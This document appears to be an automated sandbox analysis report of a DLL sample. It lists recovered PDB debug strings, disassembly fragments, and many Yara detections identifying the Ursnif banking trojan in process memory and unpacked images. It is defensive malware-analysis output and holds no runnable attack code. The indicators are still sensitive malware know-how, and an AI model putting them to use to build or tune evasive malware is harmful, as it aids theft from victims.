                      Source: 616412739e268.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.880000220.0000000004643000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbJv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbvv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb: source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbnv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbE source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbO{ source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbQt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbr source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbLy source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbby source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbXv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbx source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbQ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbet source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbst source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: wsspicli.pdbWt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbw source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbCt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.879269729.0000000000684000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb]t source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbbv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbhv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbpv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbI source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbOt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdbIt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbkt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb|v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: imagehlp.pdb^v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbEm5 source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb&v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbyt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb,v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891777281.00000000009AC000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdbC source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbRv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbDv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D21A3 push ecx; ret 0_2_6E2D21B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D2150 push ecx; ret 0_2_6E2D2159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E30AB9A push ecx; ret 0_2_6E30ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDABE0 push ecx; ret 3_2_04CDABE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDAF13 push ecx; ret 3_2_04CDAF23
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E30AB9A push ecx; ret 3_2_6E30ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497ABE0 push ecx; ret 5_2_0497ABE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497AF13 push ecx; ret 5_2_0497AF23
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress,0_2_6E2D1DE5

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
